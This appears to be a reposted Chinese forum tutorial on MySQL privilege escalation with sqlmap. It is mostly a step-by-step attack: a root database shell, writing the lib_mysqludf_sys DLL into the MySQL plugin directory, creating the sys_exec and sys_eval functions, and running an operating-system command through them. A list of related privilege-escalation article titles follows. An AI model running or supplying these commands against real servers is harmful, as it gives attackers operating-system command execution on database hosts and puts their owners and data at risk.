利用sqlmap进行mysql提权的小方法(win与liunx通用)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了利用sqlmap进行mysql提权的小方法(win与liunx通用)相关的知识,希望对你有一定的参考价值。

文章作者:[email protected]
文章来源:https://www.t00ls.net/thread-36196-1-1.html
1.连接mysql数据打开一个交互shell:
sqlmap.py -d mysql://root:[email protected]:3306/test --sql-shell
select @@version;
select @@plugin_dir;
d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:
sqlmap.py -d mysql://root:[email protected]:3306/test --file-write=d:/tmp/lib_mysqludf_sys.dll --file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll
CREATE FUNCTION sys_exec RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘
CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘
select sys_eval(‘ver‘);

以上是关于利用sqlmap进行mysql提权的小方法(win与liunx通用)的主要内容,如果未能解决你的问题,请参考以下文章

利用iis漏洞进行提权的功能是?

Mysql提权-基于Mysql的UDF提权(Windows系统)1

WIN10现在是否有一种提权漏洞?

【Windows】自带提权的bat脚本

如何找漏洞,又怎样利用它提权

SQLMAP UDF提权